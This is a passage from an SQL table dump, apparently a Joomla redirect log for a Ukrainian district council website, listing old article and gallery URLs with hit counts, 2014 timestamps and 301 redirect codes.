00:00:00',301),(2416,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=904:-2012-2013-&catid=47&Itemid=86&lang=en','','','',6,0,'2014-09-19 10:33:58','0000-00-00 00:00:00',301),(2417,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',12,0,'2014-09-19 10:35:15','0000-00-00 00:00:00',301),(2418,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&lang=uk','','','',3,0,'2014-09-19 10:36:33','0000-00-00 00:00:00',301),(2419,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11&Itemid=14&lang=uk','','','',11,0,'2014-09-19 10:37:46','0000-00-00 00:00:00',301),(2420,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=981:2013-04-03-07-23-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-19 10:39:25','0000-00-00 00:00:00',301),(2421,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=uk','','','',5,0,'2014-09-19 10:41:11','0000-00-00 00:00:00',301),(2422,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=994:2013-04-23-08-30-51&catid=50:--23042013-&Itemid=90&lang=uk','','','',14,0,'2014-09-19 10:42:35','0000-00-00 00:00:00',301),(2423,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&Itemid=14&lang=uk','','','',19,0,'2014-09-19 10:42:37','0000-00-00 00:00:00',301),(2424,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-19 10:43:43','0000-00-00 00:00:00',301),(2425,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1131:9-------&catid=11&Itemid=14&lang=uk','','','',13,0,'2014-09-19 10:45:35','0000-00-00 00:00:00',301),(2426,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1364:-2012-2015-&catid=60:--11072014-&Itemid=108&lang=ru','','','',11,0,'2014-09-19 10:45:45','0000-00-00 00:00:00',301),(2427,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1169:2014-01-08-07-30-47&catid=55&Itemid=96&lang=uk','','','',1,0,'2014-09-19 10:46:05','0000-00-00 00:00:00',301),(2428,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&catid=51&Itemid=92&lang=uk','','','',7,0,'2014-09-19 10:51:51','0000-00-00 00:00:00',301),(2429,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&catid=57:--15042014-&Itemid=98&lang=en','','','',3,0,'2014-09-19 10:55:29','0000-00-00 00:00:00',301),(2430,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-19 10:56:05','0000-00-00 00:00:00',301),(2431,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=961:2013-03-11-10-51-56&catid=48:--11032013-&Itemid=87&lang=uk','','','',8,0,'2014-09-19 11:04:29','0000-00-00 00:00:00',301),(2432,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-19 11:10:40','0000-00-00 00:00:00',301),(2433,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1244:-2014-2018-&catid=58&Itemid=105&lang=en','','','',2,0,'2014-09-19 11:15:07','0000-00-00 00:00:00',301),(2434,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:------------2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',14,0,'2014-09-19 11:15:42','0000-00-00 00:00:00',301),(2435,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-19 11:17:02','0000-00-00 00:00:00',301),(2436,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1022:-------lr---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',7,0,'2014-09-19 11:17:49','0000-00-00 00:00:00',301),(2437,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=uk&Itemid=0','','','',4,0,'2014-09-19 11:17:51','0000-00-00 00:00:00',301),(2438,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=936:2013-02-21-09-43-43&catid=47&Itemid=86&lang=uk','','','',7,0,'2014-09-19 11:18:39','0000-00-00 00:00:00',301),(2439,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-19 11:18:45','0000-00-00 00:00:00',301),(2440,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=54:--29112013-&Itemid=95&lang=ru','','','',15,0,'2014-09-19 11:19:31','0000-00-00 00:00:00',301),(2441,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-19 11:19:33','0000-00-00 00:00:00',301),(2442,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-19 11:20:58','0000-00-00 00:00:00',301),(2443,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:-2013-&catid=11&Itemid=14&lang=en','','','',6,0,'2014-09-19 11:22:44','0000-00-00 00:00:00',301),(2444,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=uk','','','',6,0,'2014-09-19 11:25:04','0000-00-00 00:00:00',301),(2445,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',19,0,'2014-09-19 11:27:04','0000-00-00 00:00:00',301),(2446,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-19 11:27:06','0000-00-00 00:00:00',301),(2447,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=49&Itemid=88&lang=uk','','','',5,0,'2014-09-19 11:27:56','0000-00-00 00:00:00',301),(2448,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-19 11:27:58','0000-00-00 00:00:00',301),(2449,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-19 11:29:03','0000-00-00 00:00:00',301),(2450,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&Itemid=14&lang=uk','','','',15,0,'2014-09-19 11:29:08','0000-00-00 00:00:00',301),(2451,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1368:2014-07-17-04-39-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-19 11:29:28','0000-00-00 00:00:00',301),(2452,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11&Itemid=14&lang=en','','','',12,0,'2014-09-19 11:29:57','0000-00-00 00:00:00',301),(2453,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11&lang=uk','','','',7,0,'2014-09-19 11:30:30','0000-00-00 00:00:00',301),(2454,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=931:2013-02-21-09-14-48&catid=47&Itemid=86&lang=uk','','','',4,0,'2014-09-19 11:32:21','0000-00-00 00:00:00',301),(2455,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1080:-l-r&catid=53&Itemid=94&lang=uk','','','',4,0,'2014-09-19 11:32:47','0000-00-00 00:00:00',301),(2456,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:-2014-&catid=53&Itemid=94&lang=uk','','','',13,0,'2014-09-19 11:34:32','0000-00-00 00:00:00',301),(2457,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=854:2012-12-11-13-40-55&catid=32&Itemid=64&lang=uk','','','',13,0,'2014-09-19 11:34:58','0000-00-00 00:00:00',301),(2458,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-19 11:35:26','0000-00-00 00:00:00',301),(2459,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1150:2013-11-28-14-53-17&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',7,0,'2014-09-19 11:36:47','0000-00-00 00:00:00',301),(2460,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-19 11:37:34','0000-00-00 00:00:00',301),(2461,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=983:2013-04-04-11-23-57&catid=49&Itemid=88&lang=ru','','','',9,0,'2014-09-19 11:37:59','0000-00-00 00:00:00',301),(2462,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-19 11:39:41','0000-00-00 00:00:00',301),(2463,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&Itemid=14&lang=ru','','','',13,0,'2014-09-19 11:41:06','0000-00-00 00:00:00',301),(2464,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&Itemid=14&lang=en','','','',8,0,'2014-09-19 11:42:54','0000-00-00 00:00:00',301),(2465,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1378:2014-08-27-11-29-34&catid=11&Itemid=14&lang=en','','','',14,0,'2014-09-19 11:44:11','0000-00-00 00:00:00',301),(2466,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:------------------l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',13,0,'2014-09-19 11:46:14','0000-00-00 00:00:00',301),(2467,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-19 11:47:16','0000-00-00 00:00:00',301),(2468,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=47&Itemid=86&lang=uk','','','',12,0,'2014-09-19 11:48:20','0000-00-00 00:00:00',301),(2469,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=959:2013-03-11-06-19-41&catid=49:--12042013-&Itemid=88&lang=en','','','',5,0,'2014-09-19 11:48:34','0000-00-00 00:00:00',301),(2470,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-19 11:49:42','0000-00-00 00:00:00',301),(2471,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&Itemid=14&lang=en','','','',10,0,'2014-09-19 11:50:29','0000-00-00 00:00:00',301),(2472,'http://www.malyn-rayrada.org.ua/index.php/kontakti','','http://www.malyn-rayrada.org.ua/index.php/kontakti','',1,0,'2014-09-19 11:50:43','0000-00-00 00:00:00',301),(2473,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&Itemid=14&lang=en','','','',1,0,'2014-09-19 11:52:40','0000-00-00 00:00:00',301),(2474,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&Itemid=14&lang=uk','','','',15,0,'2014-09-19 11:52:45','0000-00-00 00:00:00',301),(2475,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=uk','','','',7,0,'2014-09-19 11:53:59','0000-00-00 00:00:00',301),(2476,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-19 11:55:45','0000-00-00 00:00:00',301),(2477,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&lang=uk','','','',8,0,'2014-09-19 11:55:59','0000-00-00 00:00:00',301),(2478,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1231:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',21,0,'2014-09-19 11:56:44','0000-00-00 00:00:00',301),(2479,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=54&Itemid=95&lang=uk','','','',6,0,'2014-09-19 11:57:31','0000-00-00 00:00:00',301),(2480,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=930:2013-02-21-09-13-00&catid=47:-21022013-&Itemid=86&lang=ru','','','',11,0,'2014-09-19 11:57:35','0000-00-00 00:00:00',301),(2481,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-19 11:58:17','0000-00-00 00:00:00',301),(2482,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:--24--6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-19 11:58:19','0000-00-00 00:00:00',301),(2483,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',6,0,'2014-09-19 11:59:51','0000-00-00 00:00:00',301),(2484,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',6,0,'2014-09-19 12:00:01','0000-00-00 00:00:00',301),(2485,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&Itemid=14&lang=ru','','','',12,0,'2014-09-19 12:00:18','0000-00-00 00:00:00',301),(2486,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-19 12:00:24','0000-00-00 00:00:00',301),(2487,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1087:--------12--2013---398-l-------2013-r---19--2013---416-l-------2013-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',7,0,'2014-09-19 12:01:04','0000-00-00 00:00:00',301),(2488,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-09-19 12:01:44','0000-00-00 00:00:00',301),(2489,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-19 12:02:23','0000-00-00 00:00:00',301),(2490,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=32&lang=en','','','',17,0,'2014-09-19 12:03:34','0000-00-00 00:00:00',301),(2491,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=983:2013-04-04-11-23-57&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2014-09-19 12:03:38','0000-00-00 00:00:00',301),(2492,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=uk','','','',11,0,'2014-09-19 12:06:41','0000-00-00 00:00:00',301),(2493,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-19 12:07:05','0000-00-00 00:00:00',301),(2494,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-19 12:07:33','0000-00-00 00:00:00',301),(2495,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-lr-2012-2015-&catid=49:--12042013-&Itemid=88&lang=uk','','','',10,0,'2014-09-19 12:07:59','0000-00-00 00:00:00',301),(2496,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&catid=38&Itemid=73&lang=uk','','','',17,0,'2014-09-19 12:09:32','0000-00-00 00:00:00',301),(2497,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:-2010-2015-&catid=49:--12042013-&Itemid=88&lang=uk','','','',18,0,'2014-09-19 12:12:36','0000-00-00 00:00:00',301),(2498,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-19 12:13:06','0000-00-00 00:00:00',301),(2499,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1058:-2013-&catid=51:--19072013-&Itemid=92&lang=ru','','','',21,0,'2014-09-19 12:14:12','0000-00-00 00:00:00',301),(2500,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11&lang=uk','','','',9,0,'2014-09-19 12:15:59','0000-00-00 00:00:00',301),(2501,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',10,0,'2014-09-19 12:21:42','0000-00-00 00:00:00',301),(2502,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1173:2014-01-15-10-37-18&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-19 12:23:58','0000-00-00 00:00:00',301),(2503,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2014-09-19 12:24:03','0000-00-00 00:00:00',301),(2504,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=51&Itemid=92&lang=uk','','','',7,0,'2014-09-19 12:27:51','0000-00-00 00:00:00',301),(2505,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-19 12:28:28','0000-00-00 00:00:00',301),(2506,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1141:2013-11-26-13-18-12&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',8,0,'2014-09-19 12:29:02','0000-00-00 00:00:00',301),(2507,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',20,0,'2014-09-19 12:32:34','0000-00-00 00:00:00',301),(2508,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&Itemid=14&lang=uk','','','',14,0,'2014-09-19 12:35:04','0000-00-00 00:00:00',301),(2509,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=uk','','','',5,0,'2014-09-19 12:38:12','0000-00-00 00:00:00',301),(2510,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',4,0,'2014-09-19 12:40:33','0000-00-00 00:00:00',301),(2511,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:-l-r&catid=53&Itemid=94&lang=en','','','',5,0,'2014-09-19 12:41:03','0000-00-00 00:00:00',301),(2512,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&Itemid=14&lang=uk','','','',12,0,'2014-09-19 12:42:24','0000-00-00 00:00:00',301),(2513,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1303:2014-04-29-13-13-18&catid=10&Itemid=17&lang=uk','','','',3,0,'2014-09-19 12:49:55','0000-00-00 00:00:00',301),(2514,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-19 12:51:55','0000-00-00 00:00:00',301),(2515,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1104:-lr&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',4,0,'2014-09-19 12:53:23','0000-00-00 00:00:00',301),(2516,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-19 12:54:52','0000-00-00 00:00:00',301),(2517,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',20,0,'2014-09-19 12:57:08','0000-00-00 00:00:00',301),(2518,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-19 12:57:35','0000-00-00 00:00:00',301),(2519,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=885:-2013-2015-&catid=46&Itemid=85&lang=en','','','',6,0,'2014-09-19 12:58:39','0000-00-00 00:00:00',301),(2520,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=27:2010-06-07-11-05-24&catid=21&Itemid=47&lang=en','','','',11,0,'2014-09-19 12:59:57','0000-00-00 00:00:00',301),(2521,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=51:--19072013-&Itemid=92&lang=en','','','',14,0,'2014-09-19 13:00:30','0000-00-00 00:00:00',301),(2522,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-19 13:02:00','0000-00-00 00:00:00',301),(2523,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-19 13:03:51','0000-00-00 00:00:00',301),(2524,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-19 13:07:32','0000-00-00 00:00:00',301),(2525,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-19 13:09:04','0000-00-00 00:00:00',301),(2526,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-19 13:15:59','0000-00-00 00:00:00',301),(2527,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',17,0,'2014-09-19 13:16:45','0000-00-00 00:00:00',301),(2528,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1162:2013-12-19-06-13-29&catid=11&lang=uk','','','',9,0,'2014-09-19 13:18:44','0000-00-00 00:00:00',301),(2529,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-19 13:19:51','0000-00-00 00:00:00',301),(2530,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=27:2010-06-07-11-05-24&catid=21:2010-06-07-09-43-24&Itemid=47&lang=ru','','','',15,0,'2014-09-19 13:20:34','0000-00-00 00:00:00',301),(2531,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&catid=51&Itemid=92&lang=uk','','','',8,0,'2014-09-19 13:21:22','0000-00-00 00:00:00',301),(2532,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=983:2013-04-04-11-23-57&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2014-09-19 13:22:33','0000-00-00 00:00:00',301),(2533,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=uk','','','',7,0,'2014-09-19 13:23:04','0000-00-00 00:00:00',301),(2534,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1090:-l-r-&catid=53&Itemid=94&lang=en','','','',6,0,'2014-09-19 13:23:36','0000-00-00 00:00:00',301),(2535,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=47:-21022013-&Itemid=86&lang=ru','','','',23,0,'2014-09-19 13:28:09','0000-00-00 00:00:00',301),(2536,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11&lang=en&Itemid=','','','',6,0,'2014-09-19 13:28:56','0000-00-00 00:00:00',301),(2537,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1251:2014-03-24-07-11-22&catid=57&Itemid=98&lang=uk','','','',8,0,'2014-09-19 13:28:58','0000-00-00 00:00:00',301),(2538,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-19 13:31:13','0000-00-00 00:00:00',301),(2539,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1242:------25--2011--74---19--2011---193-&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-09-19 13:31:25','0000-00-00 00:00:00',301),(2540,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',10,0,'2014-09-19 13:31:47','0000-00-00 00:00:00',301),(2541,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1151:2013-11-28-14-54-33&catid=54&Itemid=95&lang=uk','','','',3,0,'2014-09-19 13:32:09','0000-00-00 00:00:00',301),(2542,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-19 13:33:00','0000-00-00 00:00:00',301),(2543,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1169:2014-01-08-07-30-47&catid=55:--26122013-&Itemid=96&lang=en','','','',13,0,'2014-09-19 13:33:43','0000-00-00 00:00:00',301),(2544,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1089:-l-r-&catid=53:--25102013-&Itemid=94&lang=ru','','','',8,0,'2014-09-19 13:34:22','0000-00-00 00:00:00',301),(2545,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-19 13:34:28','0000-00-00 00:00:00',301),(2546,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-19 13:35:19','0000-00-00 00:00:00',301),(2547,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=32&lang=en','','','',12,0,'2014-09-19 13:35:38','0000-00-00 00:00:00',301),(2548,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1241:2014-03-17-07-05-06&catid=57&Itemid=98&lang=uk','','','',8,0,'2014-09-19 13:37:11','0000-00-00 00:00:00',301),(2549,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=965:2013-03-14-10-56-03&catid=11&lang=en&Itemid=0','','','',9,0,'2014-09-19 13:38:30','0000-00-00 00:00:00',301),(2550,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&lang=ru&Itemid=','','','',5,0,'2014-09-19 13:39:55','0000-00-00 00:00:00',301),(2551,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&Itemid=14&lang=en','','','',14,0,'2014-09-19 13:39:57','0000-00-00 00:00:00',301),(2552,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=876:2012-12-18-09-32-45&catid=46&Itemid=85&lang=en','','','',3,0,'2014-09-19 13:40:49','0000-00-00 